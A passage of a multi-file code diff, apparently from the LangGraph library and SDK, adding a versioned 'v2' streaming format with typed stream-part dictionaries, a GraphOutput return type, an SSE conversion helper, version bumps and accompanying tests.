) -> dict[str, Any] | Any:
"""Create a run, wait until it finishes and return the final state.
@@ -937,12 +1039,14 @@ class RemoteGraph(PregelProtocol):
interrupt_before: Interrupt the graph before these nodes.
interrupt_after: Interrupt the graph after these nodes.
headers: Additional headers to pass to the request.
stream_version: The streaming format version. `"v1"` (default) returns the
traditional format, `"v2"` returns `StreamPart` typed dicts.
**kwargs: Additional params to pass to RemoteGraph.stream.
Returns:
The output of the graph.
"""
for chunk in self.stream(
for chunk in self.stream( # type: ignore[misc, call-overload]
input,
config=config,
interrupt_before=interrupt_before,
@@ -950,15 +1054,49 @@ class RemoteGraph(PregelProtocol):
headers=headers,
stream_mode="values",
params=params,
stream_version=stream_version,
**kwargs,
):
pass
try:
if stream_version == "v2":
return GraphOutput(
value=chunk["data"],
interrupts=tuple(chunk.get("interrupts", ())),
)
return chunk
except UnboundLocalError:
logger.warning("No events received from remote graph")
return None
@overload
async def ainvoke(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1"],
**kwargs: Any,
) -> dict[str, Any] | Any: ...
@overload
async def ainvoke(
self,
input: dict[str, Any] | Any,
config: RunnableConfig | None = None,
*,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v2"] = ...,
**kwargs: Any,
) -> GraphOutput[dict[str, Any]]: ...
async def ainvoke(
self,
input: dict[str, Any] | Any,
@@ -968,6 +1106,7 @@ class RemoteGraph(PregelProtocol):
interrupt_after: All | Sequence[str] | None = None,
headers: dict[str, str] | None = None,
params: QueryParamTypes | None = None,
stream_version: Literal["v1", "v2"] = "v2",
**kwargs: Any,
) -> dict[str, Any] | Any:
"""Create a run, wait until it finishes and return the final state.
@@ -978,12 +1117,14 @@ class RemoteGraph(PregelProtocol):
interrupt_before: Interrupt the graph before these nodes.
interrupt_after: Interrupt the graph after these nodes.
headers: Additional headers to pass to the request.
stream_version: The streaming format version. `"v1"` (default) returns the
traditional format, `"v2"` returns `StreamPart` typed dicts.
**kwargs: Additional params to pass to RemoteGraph.astream.
Returns:
The output of the graph.
"""
async for chunk in self.astream(
async for chunk in self.astream( # type: ignore[misc, call-overload]
input,
config=config,
interrupt_before=interrupt_before,
@@ -991,10 +1132,16 @@ class RemoteGraph(PregelProtocol):
headers=headers,
stream_mode="values",
params=params,
stream_version=stream_version,
**kwargs,
):
pass
try:
if stream_version == "v2":
return GraphOutput(
value=chunk["data"],
interrupts=tuple(chunk.get("interrupts", ())),
)
return chunk
except UnboundLocalError:
logger.warning("No events received from remote graph")
+239 -1
View File
@@ -16,17 +16,26 @@ from typing import (
)
from warnings import warn
from langchain_core.messages import AnyMessage
from langchain_core.runnables import Runnable, RunnableConfig
from langgraph.checkpoint.base import BaseCheckpointSaver, CheckpointMetadata
from typing_extensions import Unpack, deprecated
from typing_extensions import NotRequired, TypeAliasType, TypedDict, Unpack, deprecated
from xxhash import xxh3_128_hexdigest
from langgraph._internal._cache import default_cache_key
from langgraph._internal._constants import INTERRUPT as _INTERRUPT_KEY
from langgraph._internal._fields import get_cached_annotated_keys, get_update_as_tuples
from langgraph._internal._retry import default_retry_on
from langgraph._internal._typing import MISSING, DeprecatedKwargs
from langgraph.warnings import LangGraphDeprecatedSinceV10
# Local TypeVars for generic stream TypedDicts.
# We use separate TypeVars here (rather than importing from langgraph.typing)
# because the typing module TypeVars have defaults that cause mypy issues
# when used in standalone type aliases.
StateT = TypeVar("StateT")
OutputT = TypeVar("OutputT")
if TYPE_CHECKING:
from langgraph.pregel.protocol import PregelProtocol
@@ -44,6 +53,19 @@ __all__ = (
"Checkpointer",
"StreamMode",
"StreamWriter",
"StreamPart",
"ValuesStreamPart",
"UpdatesStreamPart",
"MessagesStreamPart",
"CustomStreamPart",
"CheckpointStreamPart",
"TasksStreamPart",
"DebugStreamPart",
"TaskPayload",
"TaskResultPayload",
"CheckpointTask",
"CheckpointPayload",
"DebugPayload",
"RetryPolicy",
"CachePolicy",
"Interrupt",
@@ -56,6 +78,7 @@ __all__ = (
"Durability",
"interrupt",
"Overwrite",
"GraphOutput",
"ensure_valid_checkpointer",
)
@@ -113,6 +136,221 @@ StreamWriter = Callable[[Any], None]
Always injected into nodes if requested as a keyword argument, but it's a no-op
when not using `stream_mode="custom"`."""
class TaskPayload(TypedDict):
"""Payload for a task start event."""
id: str
name: str
input: Any
triggers: list[str]
class TaskResultPayload(TypedDict):
"""Payload for a task result event."""
id: str
name: str
error: str | None
interrupts: list[dict]
result: dict[str, Any]
class CheckpointTask(TypedDict):
"""A task entry within a `CheckpointPayload`.
The keys present depend on the task's state:
- **Error:** `id`, `name`, `error`, `state`
- **Has result:** `id`, `name`, `result`, `interrupts`, `state`
- **Pending:** `id`, `name`, `interrupts`, `state`
"""
id: str
name: str
error: NotRequired[str]
result: NotRequired[Any]
interrupts: NotRequired[list[dict]]
state: StateSnapshot | RunnableConfig | None
class CheckpointPayload(TypedDict, Generic[StateT]):
"""Payload for a checkpoint event."""
config: RunnableConfig | None
metadata: CheckpointMetadata
values: StateT
next: list[str]
parent_config: RunnableConfig | None
tasks: list[CheckpointTask]
class _DebugCheckpointPayload(TypedDict, Generic[StateT]):
step: int
timestamp: str
type: Literal["checkpoint"]
payload: CheckpointPayload[StateT]
class _DebugTaskPayload(TypedDict):
step: int
timestamp: str
type: Literal["task"]
payload: TaskPayload
class _DebugTaskResultPayload(TypedDict):
step: int
timestamp: str
type: Literal["task_result"]
payload: TaskResultPayload
DebugPayload = TypeAliasType(
"DebugPayload",
_DebugCheckpointPayload[StateT] | _DebugTaskPayload | _DebugTaskResultPayload,
type_params=(StateT,),
)
"""Wrapper payload for debug events. Discriminate on `type`."""
class ValuesStreamPart(TypedDict, Generic[OutputT]):
"""Stream part emitted for `stream_mode="values"`.
`data` contains the full state after each step, as returned by `read_channels()`.
"""
type: Literal["values"]
ns: tuple[str, ...]
data: OutputT
interrupts: tuple[Interrupt, ...]
class UpdatesStreamPart(TypedDict):
"""Stream part emitted for `stream_mode="updates"`.
`data` maps node names to their outputs. May also contain
`__interrupt__` (tuple of `Interrupt` dicts) and `__metadata__` keys.
"""
type: Literal["updates"]
ns: tuple[str, ...]
data: dict[str, Any]
class MessagesStreamPart(TypedDict):
"""Stream part emitted for `stream_mode="messages"`.
`data` is a 2-tuple of `(message, metadata)` where `message` is a
`BaseMessage` (e.g. `AIMessageChunk`) and `metadata` is a dict containing
keys like `langgraph_step`, `langgraph_node`, `langgraph_triggers`, etc.
"""
type: Literal["messages"]
ns: tuple[str, ...]
data: tuple[AnyMessage, dict[str, Any]]
class CustomStreamPart(TypedDict):
"""Stream part emitted for `stream_mode="custom"`.
`data` is whatever value was passed to `StreamWriter` inside a node.
"""
type: Literal["custom"]
ns: tuple[str, ...]
data: Any
class CheckpointStreamPart(TypedDict, Generic[StateT]):
"""Stream part emitted for `stream_mode="checkpoints"`."""
type: Literal["checkpoints"]
ns: tuple[str, ...]
data: CheckpointPayload[StateT]
class TasksStreamPart(TypedDict):
"""Stream part emitted for `stream_mode="tasks"`.
For task start events, `data` is a `TaskPayload` with `id`, `name`,
`input`, and `triggers` keys.
For task result events, `data` is a `TaskResultPayload` with `id`,
`name`, `error`, `interrupts`, and `result` keys.
"""
type: Literal["tasks"]
ns: tuple[str, ...]
data: TaskPayload | TaskResultPayload
class DebugStreamPart(TypedDict, Generic[StateT]):
"""Stream part emitted for `stream_mode="debug"`."""
type: Literal["debug"]
ns: tuple[str, ...]
data: DebugPayload[StateT]
StreamPart = TypeAliasType(
"StreamPart",
ValuesStreamPart[OutputT]
| UpdatesStreamPart
| MessagesStreamPart
| CustomStreamPart
| CheckpointStreamPart[StateT]
| TasksStreamPart
| DebugStreamPart[StateT],
type_params=(OutputT, StateT),
)
"""A discriminated union of all v2 stream part types.
Use `part["type"]` to narrow the type:
```python
async for part in graph.astream(input, stream_version="v2"):
if part["type"] == "values":
part["data"] # OutputT — full state (pydantic/dataclass/dict)
elif part["type"] == "messages":
part["data"] # tuple[BaseMessage, dict] — (message, metadata)
elif part["type"] == "custom":
part["data"] # Any — user-defined
```
"""
@dataclass(frozen=True)
class GraphOutput(Generic[OutputT]):
"""Typed container returned by `invoke()` / `ainvoke()` with `stream_version="v2"`.
Attributes:
value: The final output of the graph (dict, Pydantic model, dataclass, etc.).
interrupts: Any interrupts that occurred during execution.
"""
value: OutputT
interrupts: tuple[Interrupt, ...] = ()
def __getitem__(self, key: str) -> Any:
"""Backward compat: `result['__interrupt__']` and dict-key access."""
if key == _INTERRUPT_KEY:
return self.interrupts
if isinstance(self.value, dict):
return self.value[key]
try:
return getattr(self.value, key)
except AttributeError:
raise KeyError(key)
def __contains__(self, key: object) -> bool:
if key == _INTERRUPT_KEY:
return bool(self.interrupts)
if isinstance(self.value, dict):
return key in self.value
return isinstance(key, str) and hasattr(self.value, key)
_DC_KWARGS = {"kw_only": True, "slots": True, "frozen": True}
+1 -1
View File
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
[project]
name = "langgraph"
version = "1.0.10"
version = "1.0.10rc1"
description = "Building stateful, multi-actor applications with LLMs"
authors = []
requires-python = ">=3.10"
File diff suppressed because it is too large Load Diff
+4 -6
View File
@@ -1367,7 +1367,7 @@ wheels = [
[[package]]
name = "langgraph"
version = "1.0.10"
version = "1.0.10rc1"
source = { editable = "." }
dependencies = [
{ name = "langchain-core" },
@@ -1548,7 +1548,7 @@ wheels = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "../checkpoint" }
dependencies = [
{ name = "langchain-core" },
@@ -1689,25 +1689,23 @@ name = "langgraph-cli"
source = { editable = "../cli" }
dependencies = [
{ name = "click", marker = "python_full_version < '3.14'" },
{ name = "httpx", marker = "python_full_version < '3.14'" },
{ name = "langgraph-sdk", marker = "python_full_version >= '3.11' and python_full_version < '3.14'" },
{ name = "python-dotenv", marker = "python_full_version < '3.14'" },
]
[package.optional-dependencies]
inmem = [
{ name = "langgraph-api", marker = "python_full_version >= '3.11' and python_full_version < '3.14'" },
{ name = "langgraph-runtime-inmem", marker = "python_full_version >= '3.11' and python_full_version < '3.14'" },
{ name = "python-dotenv", marker = "python_full_version < '3.14'" },
]
[package.metadata]
requires-dist = [
{ name = "click", specifier = ">=8.1.7" },
{ name = "httpx", specifier = ">=0.24.0" },
{ name = "langgraph-api", marker = "python_full_version >= '3.11' and extra == 'inmem'", specifier = ">=0.5.35,<0.8.0" },
{ name = "langgraph-runtime-inmem", marker = "python_full_version >= '3.11' and extra == 'inmem'", specifier = ">=0.7" },
{ name = "langgraph-sdk", marker = "python_full_version >= '3.11'", specifier = ">=0.1.0" },
{ name = "python-dotenv", specifier = ">=0.8.0" },
{ name = "python-dotenv", marker = "extra == 'inmem'", specifier = ">=0.8.0" },
]
provides-extras = ["inmem"]
+2 -2
View File
@@ -268,7 +268,7 @@ wheels = [
[[package]]
name = "langgraph"
version = "1.0.10"
version = "1.0.10rc1"
source = { editable = "../langgraph" }
dependencies = [
{ name = "langchain-core" },
@@ -352,7 +352,7 @@ test = [
[[package]]
name = "langgraph-checkpoint"
version = "4.0.1"
version = "4.0.1rc4"
source = { editable = "../checkpoint" }
dependencies = [
{ name = "langchain-core" },
+88 -6
View File
@@ -5,12 +5,15 @@ from __future__ import annotations
import builtins
import warnings
from collections.abc import AsyncIterator, Callable, Mapping, Sequence
from typing import Any, overload
from typing import Any, Literal, overload
import httpx
from langgraph_sdk._async.http import HttpClient
from langgraph_sdk._shared.utilities import _get_run_metadata_from_response
from langgraph_sdk._shared.utilities import (
_get_run_metadata_from_response,
_sse_to_v2_dict,
)
from langgraph_sdk.schema import (
All,
BulkCancelRunsStatus,
@@ -33,9 +36,21 @@ from langgraph_sdk.schema import (
RunStatus,
StreamMode,
StreamPart,
StreamPartV2,
StreamVersion,
)
async def _wrap_stream_v2(
raw: AsyncIterator[StreamPart],
) -> AsyncIterator[StreamPartV2]:
"""Wrap a raw SSE stream, converting each event to a v2 dict."""
async for part in raw:
v2 = _sse_to_v2_dict(part.event, part.data)
if v2 is not None:
yield v2
class RunsClient:
"""Client for managing runs in LangGraph.
@@ -81,6 +96,66 @@ class RunsClient:
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v1"],
) -> AsyncIterator[StreamPart]: ...
@overload
def stream(
self,
thread_id: str,
assistant_id: str,
*,
input: Input | None = None,
command: Command | None = None,
stream_mode: StreamMode | Sequence[StreamMode] = "values",
stream_subgraphs: bool = False,
stream_resumable: bool = False,
metadata: Mapping[str, Any] | None = None,
config: Config | None = None,
context: Context | None = None,
checkpoint: Checkpoint | None = None,
checkpoint_id: str | None = None,
checkpoint_during: bool | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
feedback_keys: Sequence[str] | None = None,
on_disconnect: DisconnectMode | None = None,
webhook: str | None = None,
multitask_strategy: MultitaskStrategy | None = None,
if_not_exists: IfNotExists | None = None,
after_seconds: int | None = None,
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v2"] = "v2",
) -> AsyncIterator[StreamPartV2]: ...
@overload
def stream(
self,
thread_id: None,
assistant_id: str,
*,
input: Input | None = None,
command: Command | None = None,
stream_mode: StreamMode | Sequence[StreamMode] = "values",
stream_subgraphs: bool = False,
stream_resumable: bool = False,
metadata: Mapping[str, Any] | None = None,
config: Config | None = None,
checkpoint_during: bool | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
feedback_keys: Sequence[str] | None = None,
on_disconnect: DisconnectMode | None = None,
on_completion: OnCompletionBehavior | None = None,
if_not_exists: IfNotExists | None = None,
webhook: str | None = None,
after_seconds: int | None = None,
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v1"],
) -> AsyncIterator[StreamPart]: ...
@overload
@@ -108,7 +183,8 @@ class RunsClient:
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
) -> AsyncIterator[StreamPart]: ...
stream_version: Literal["v2"] = "v2",
) -> AsyncIterator[StreamPartV2]: ...
def stream(
self,
@@ -139,7 +215,8 @@ class RunsClient:
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
durability: Durability | None = None,
) -> AsyncIterator[StreamPart]:
stream_version: StreamVersion = "v2",
) -> AsyncIterator[StreamPart | StreamPartV2]:
"""Create a run and stream the results.
Args:
@@ -180,6 +257,8 @@ class RunsClient:
"async" means checkpoints are persisted async while next graph step executes, replaces checkpoint_during=True
"sync" means checkpoints are persisted sync after graph step executes, replaces checkpoint_during=False
"exit" means checkpoints are only persisted when the run exits, does not save intermediate steps
stream_version: Stream format version. "v1" (default) returns raw SSE StreamPart
NamedTuples. "v2" returns typed dicts with `type`, `ns`, and `data` keys.
Returns:
Asynchronous iterator of stream results.
@@ -222,7 +301,7 @@ class RunsClient:
stacklevel=2,
)
payload = {
payload: dict[str, Any] = {
"input": input,
"command": (
{k: v for k, v in command.items() if v is not None} if command else None
@@ -259,7 +338,7 @@ class RunsClient:
if on_run_created and (metadata := _get_run_metadata_from_response(res)):
on_run_created(metadata)
return self.http.stream(
raw = self.http.stream(
endpoint,
"POST",
json={k: v for k, v in payload.items() if v is not None},
@@ -267,6 +346,9 @@ class RunsClient:
headers=headers,
on_response=on_response if on_run_created else None,
)
if stream_version == "v2":
return _wrap_stream_v2(raw)
return raw
@overload
async def create(
@@ -107,6 +107,19 @@ def _get_run_metadata_from_response(
return None
def _sse_to_v2_dict(event: str, data: Any) -> dict[str, Any] | None:
"""Convert an SSE event+data pair into a v2 stream part dict.
Returns None for ``end`` events (signals end of stream).
"""
if event == "end":
return None
parts = event.split("|")
event_type = parts[0]
ns = parts[1:] if len(parts) > 1 else []
return {"type": event_type, "ns": ns, "data": data}
def _provided_vals(d: Mapping[str, Any]) -> dict[str, Any]:
return {k: v for k, v in d.items() if v is not None}
+88 -7
View File
@@ -5,11 +5,14 @@ from __future__ import annotations
import builtins
import warnings
from collections.abc import Callable, Iterator, Mapping, Sequence
from typing import Any, overload
from typing import Any, Literal, overload
import httpx
from langgraph_sdk._shared.utilities import _get_run_metadata_from_response
from langgraph_sdk._shared.utilities import (
_get_run_metadata_from_response,
_sse_to_v2_dict,
)
from langgraph_sdk._sync.http import SyncHttpClient
from langgraph_sdk.schema import (
All,
@@ -33,9 +36,21 @@ from langgraph_sdk.schema import (
RunStatus,
StreamMode,
StreamPart,
StreamPartV2,
StreamVersion,
)
def _wrap_stream_v2_sync(
raw: Iterator[StreamPart],
) -> Iterator[StreamPartV2]:
"""Wrap a raw SSE stream, converting each event to a v2 dict."""
for part in raw:
v2 = _sse_to_v2_dict(part.event, part.data)
if v2 is not None:
yield v2
class SyncRunsClient:
"""Synchronous client for managing runs in LangGraph.
@@ -80,6 +95,66 @@ class SyncRunsClient:
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v1"],
) -> Iterator[StreamPart]: ...
@overload
def stream(
self,
thread_id: str,
assistant_id: str,
*,
input: Input | None = None,
command: Command | None = None,
stream_mode: StreamMode | Sequence[StreamMode] = "values",
stream_subgraphs: bool = False,
metadata: Mapping[str, Any] | None = None,
config: Config | None = None,
context: Context | None = None,
checkpoint: Checkpoint | None = None,
checkpoint_id: str | None = None,
checkpoint_during: bool | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
feedback_keys: Sequence[str] | None = None,
on_disconnect: DisconnectMode | None = None,
webhook: str | None = None,
multitask_strategy: MultitaskStrategy | None = None,
if_not_exists: IfNotExists | None = None,
after_seconds: int | None = None,
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v2"] = "v2",
) -> Iterator[StreamPartV2]: ...
@overload
def stream(
self,
thread_id: None,
assistant_id: str,
*,
input: Input | None = None,
command: Command | None = None,
stream_mode: StreamMode | Sequence[StreamMode] = "values",
stream_subgraphs: bool = False,
stream_resumable: bool = False,
metadata: Mapping[str, Any] | None = None,
config: Config | None = None,
context: Context | None = None,
checkpoint_during: bool | None = None,
interrupt_before: All | Sequence[str] | None = None,
interrupt_after: All | Sequence[str] | None = None,
feedback_keys: Sequence[str] | None = None,
on_disconnect: DisconnectMode | None = None,
on_completion: OnCompletionBehavior | None = None,
if_not_exists: IfNotExists | None = None,
webhook: str | None = None,
after_seconds: int | None = None,
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
stream_version: Literal["v1"],
) -> Iterator[StreamPart]: ...
@overload
@@ -108,7 +183,8 @@ class SyncRunsClient:
headers: Mapping[str, str] | None = None,
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
) -> Iterator[StreamPart]: ...
stream_version: Literal["v2"] = "v2",
) -> Iterator[StreamPartV2]: ...
def stream(
self,
@@ -139,7 +215,8 @@ class SyncRunsClient:
params: QueryParamTypes | None = None,
on_run_created: Callable[[RunCreateMetadata], None] | None = None,
durability: Durability | None = None,
) -> Iterator[StreamPart]:
stream_version: StreamVersion = "v2",
) -> Iterator[StreamPart | StreamPartV2]:
"""Create a run and stream the results.
Args:
@@ -179,7 +256,8 @@ class SyncRunsClient:
"async" means checkpoints are persisted async while next graph step executes, replaces checkpoint_during=True
"sync" means checkpoints are persisted sync after graph step executes, replaces checkpoint_during=False
"exit" means checkpoints are only persisted when the run exits, does not save intermediate steps
stream_version: Stream format version. "v1" (default) returns raw SSE StreamPart
NamedTuples. "v2" returns typed dicts with `type`, `ns`, and `data` keys.
Returns:
Iterator of stream results.
@@ -218,7 +296,7 @@ class SyncRunsClient:
DeprecationWarning,
stacklevel=2,
)
payload = {
payload: dict[str, Any] = {
"input": input,
"command": (
{k: v for k, v in command.items() if v is not None} if command else None
@@ -255,7 +333,7 @@ class SyncRunsClient:
if on_run_created and (metadata := _get_run_metadata_from_response(res)):
on_run_created(metadata)
return self.http.stream(
raw = self.http.stream(
endpoint,
"POST",
json={k: v for k, v in payload.items() if v is not None},
@@ -263,6 +341,9 @@ class SyncRunsClient:
headers=headers,
on_response=on_response if on_run_created else None,
)
if stream_version == "v2":
return _wrap_stream_v2_sync(raw)
return raw
@overload
def create(
+200
View File
@@ -588,6 +588,206 @@ class StreamPart(NamedTuple):
"""The ID of the event."""
StreamVersion = Literal["v1", "v2"]
"""Stream format version.
- ``"v1"``: Traditional format raw SSE ``StreamPart`` NamedTuples.
- ``"v2"``: Each event is a typed dict with ``type``, ``ns``, and ``data`` keys.
"""
# --- Typed payload dicts (JSON-deserialized from the server) ---
class TaskPayload(TypedDict):
"""Payload for a task start event."""
id: str
name: str
input: Any
triggers: list[str]
class TaskResultPayload(TypedDict):
"""Payload for a task result event."""
id: str
name: str
error: str | None
interrupts: list[dict[str, Any]]
result: dict[str, Any]
class CheckpointTaskPayload(TypedDict):
"""A task entry within a ``CheckpointPayload``.
The keys present depend on the task's state:
- **Error:** ``id``, ``name``, ``error``, ``state``
- **Has result:** ``id``, ``name``, ``result``, ``interrupts``, ``state``
- **Pending:** ``id``, ``name``, ``interrupts``, ``state``
"""
id: str
name: str
error: NotRequired[str]
result: NotRequired[Any]
interrupts: NotRequired[list[dict[str, Any]]]
state: dict[str, Any] | None
class CheckpointPayload(TypedDict):
"""Payload for a checkpoint event."""
config: dict[str, Any] | None
metadata: dict[str, Any]
values: dict[str, Any]
next: list[str]
parent_config: dict[str, Any] | None
tasks: list[CheckpointTaskPayload]
class _DebugCheckpointPayload(TypedDict):
step: int
timestamp: str
type: Literal["checkpoint"]
payload: CheckpointPayload
class _DebugTaskPayload(TypedDict):
step: int
timestamp: str
type: Literal["task"]
payload: TaskPayload
class _DebugTaskResultPayload(TypedDict):
step: int
timestamp: str
type: Literal["task_result"]
payload: TaskResultPayload
DebugPayload = _DebugCheckpointPayload | _DebugTaskPayload | _DebugTaskResultPayload
"""Wrapper payload for debug events. Discriminate on ``type``."""
class RunMetadataPayload(TypedDict):
"""Payload for the ``metadata`` control event."""
run_id: str
# --- v2 stream part TypedDicts ---
class ValuesStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="values"``."""
type: Literal["values"]
ns: list[str]
data: dict[str, Any]
class UpdatesStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="updates"``."""
type: Literal["updates"]
ns: list[str]
data: dict[str, Any]
class MessagesPartialStreamPart(TypedDict):
"""Stream part emitted for partial message chunks (``messages/partial``)."""
type: Literal["messages/partial"]
ns: list[str]
data: list[dict[str, Any]]
class MessagesCompleteStreamPart(TypedDict):
"""Stream part emitted for complete messages (``messages/complete``)."""
type: Literal["messages/complete"]
ns: list[str]
data: list[dict[str, Any]]
class MessagesMetadataStreamPart(TypedDict):
"""Stream part emitted for message metadata (``messages/metadata``)."""
type: Literal["messages/metadata"]
ns: list[str]
data: dict[str, Any]
class MessagesTupleStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="messages"`` (raw message+metadata pair)."""
type: Literal["messages"]
ns: list[str]
data: list[dict[str, Any]]
class CustomStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="custom"``."""
type: Literal["custom"]
ns: list[str]
data: Any
class CheckpointsStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="checkpoints"``."""
type: Literal["checkpoints"]
ns: list[str]
data: CheckpointPayload
class TasksStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="tasks"``."""
type: Literal["tasks"]
ns: list[str]
data: TaskPayload | TaskResultPayload
class DebugStreamPart(TypedDict):
"""Stream part emitted for ``stream_mode="debug"``."""
type: Literal["debug"]
ns: list[str]
data: DebugPayload
class MetadataStreamPart(TypedDict):
"""Control event with ``run_id`` and other run metadata."""
type: Literal["metadata"]
ns: list[str]
data: RunMetadataPayload
StreamPartV2 = (
ValuesStreamPart
| UpdatesStreamPart
| MessagesPartialStreamPart
| MessagesCompleteStreamPart
| MessagesMetadataStreamPart
| MessagesTupleStreamPart
| CustomStreamPart
| CheckpointsStreamPart
| TasksStreamPart
| DebugStreamPart
| MetadataStreamPart
)
"""Discriminated union of all v2 stream part types.
Use ``part["type"]`` to narrow the type.
"""
class Send(TypedDict):
"""Represents a message to be sent to a specific node in the graph.
+194 -15
View File
@@ -2,18 +2,39 @@ from __future__ import annotations
from collections.abc import Iterator, Sequence
from pathlib import Path
from typing import Any
import httpx
import pytest
from typing_extensions import assert_type
from langgraph_sdk._shared.utilities import _sse_to_v2_dict
from langgraph_sdk.client import HttpClient, SyncHttpClient
from langgraph_sdk.schema import StreamPart
from langgraph_sdk.schema import (
CheckpointPayload,
CheckpointsStreamPart,
CustomStreamPart,
DebugPayload,
DebugStreamPart,
MetadataStreamPart,
RunMetadataPayload,
StreamPart,
StreamPartV2,
TaskPayload,
TaskResultPayload,
TasksStreamPart,
UpdatesStreamPart,
ValuesStreamPart,
)
from langgraph_sdk.sse import BytesLike, BytesLineDecoder, SSEDecoder
with open(Path(__file__).parent / "fixtures" / "response.txt", "rb") as f:
RESPONSE_PAYLOAD = f.read()
# --- test helpers ---
class AsyncListByteStream(httpx.AsyncByteStream):
def __init__(self, chunks: Sequence[bytes], exc: Exception | None = None) -> None:
self._chunks = list(chunks)
@@ -50,6 +71,24 @@ def iter_lines_raw(payload: list[bytes]) -> Iterator[BytesLike]:
yield from decoder.flush()
_V2_REQUIRED_KEYS = {"type", "ns", "data"}
def _assert_v2_shape(part: Any) -> None:
"""Assert a v2 stream part has the required keys and types."""
assert isinstance(part, dict), f"Expected dict, got {type(part)}"
assert part.keys() >= _V2_REQUIRED_KEYS, (
f"Missing keys: {_V2_REQUIRED_KEYS - part.keys()}"
)
assert isinstance(part["type"], str)
assert isinstance(part["ns"], list)
for elem in part["ns"]:
assert isinstance(elem, str)
# --- SSE parsing ---
def test_stream_sse():
for groups in (
[RESPONSE_PAYLOAD],
@@ -69,6 +108,9 @@ def test_stream_sse():
assert len(parts) == 79
# --- HTTP client streaming ---
@pytest.mark.asyncio
async def test_http_client_stream_flushes_trailing_event():
payload = b'event: foo\ndata: {"bar": 1}\n'
@@ -92,6 +134,26 @@ async def test_http_client_stream_flushes_trailing_event():
assert parts == [StreamPart(event="foo", data={"bar": 1})]
def test_sync_http_client_stream_flushes_trailing_event():
payload = b'event: foo\ndata: {"bar": 1}\n'
def handler(request: httpx.Request) -> httpx.Response:
assert request.headers["accept"] == "text/event-stream"
assert request.headers["cache-control"] == "no-store"
return httpx.Response(
200,
headers={"Content-Type": "text/event-stream"},
content=payload,
)
transport = httpx.MockTransport(handler)
with httpx.Client(transport=transport, base_url="https://example.com") as client:
http_client = SyncHttpClient(client)
parts = list(http_client.stream("/stream", "GET"))
assert parts == [StreamPart(event="foo", data={"bar": 1})]
def test_sync_http_client_stream_recovers_after_disconnect():
reconnect_path = "/reconnect"
first_chunks = [
@@ -228,21 +290,138 @@ async def test_http_client_stream_recovers_after_disconnect():
]
def test_sync_http_client_stream_flushes_trailing_event():
payload = b'event: foo\ndata: {"bar": 1}\n'
# --- _sse_to_v2_dict conversion ---
def handler(request: httpx.Request) -> httpx.Response:
assert request.headers["accept"] == "text/event-stream"
assert request.headers["cache-control"] == "no-store"
return httpx.Response(
200,
headers={"Content-Type": "text/event-stream"},
content=payload,
def test_sse_to_v2_dict_basic() -> None:
result = _sse_to_v2_dict("values", {"messages": [{"role": "user"}]})
assert result is not None
_assert_v2_shape(result)
assert result == {
"type": "values",
"ns": [],
"data": {"messages": [{"role": "user"}]},
}
def test_sse_to_v2_dict_with_namespace() -> None:
result = _sse_to_v2_dict("updates|sub:abc", {"key": "val"})
assert result is not None
_assert_v2_shape(result)
assert result == {
"type": "updates",
"ns": ["sub:abc"],
"data": {"key": "val"},
}
def test_sse_to_v2_dict_with_multiple_ns() -> None:
result = _sse_to_v2_dict("custom|parent|child:123", "hello")
assert result is not None
_assert_v2_shape(result)
assert result == {
"type": "custom",
"ns": ["parent", "child:123"],
"data": "hello",
}
def test_sse_to_v2_dict_end_event() -> None:
assert _sse_to_v2_dict("end", None) is None
def test_sse_to_v2_dict_metadata_event() -> None:
result = _sse_to_v2_dict("metadata", {"run_id": "abc-123"})
assert result is not None
_assert_v2_shape(result)
assert result == {
"type": "metadata",
"ns": [],
"data": {"run_id": "abc-123"},
}
def test_sse_to_v2_dict_messages_partial() -> None:
result = _sse_to_v2_dict("messages/partial", [{"type": "ai", "content": "hi"}])
assert result is not None
_assert_v2_shape(result)
assert result == {
"type": "messages/partial",
"ns": [],
"data": [{"type": "ai", "content": "hi"}],
}
# --- client-side v2 stream wrapping ---
@pytest.mark.asyncio
async def test_async_stream_v2_client_side_conversion() -> None:
from langgraph_sdk._async.runs import _wrap_stream_v2
async def mock_stream() -> Any:
yield StreamPart(event="metadata", data={"run_id": "r1"})
yield StreamPart(
event="values", data={"messages": [{"role": "user", "content": "hi"}]}
)
yield StreamPart(event="updates|sub:abc", data={"node": {"out": 1}})
yield StreamPart(event="end", data=None) # type: ignore[arg-type]
transport = httpx.MockTransport(handler)
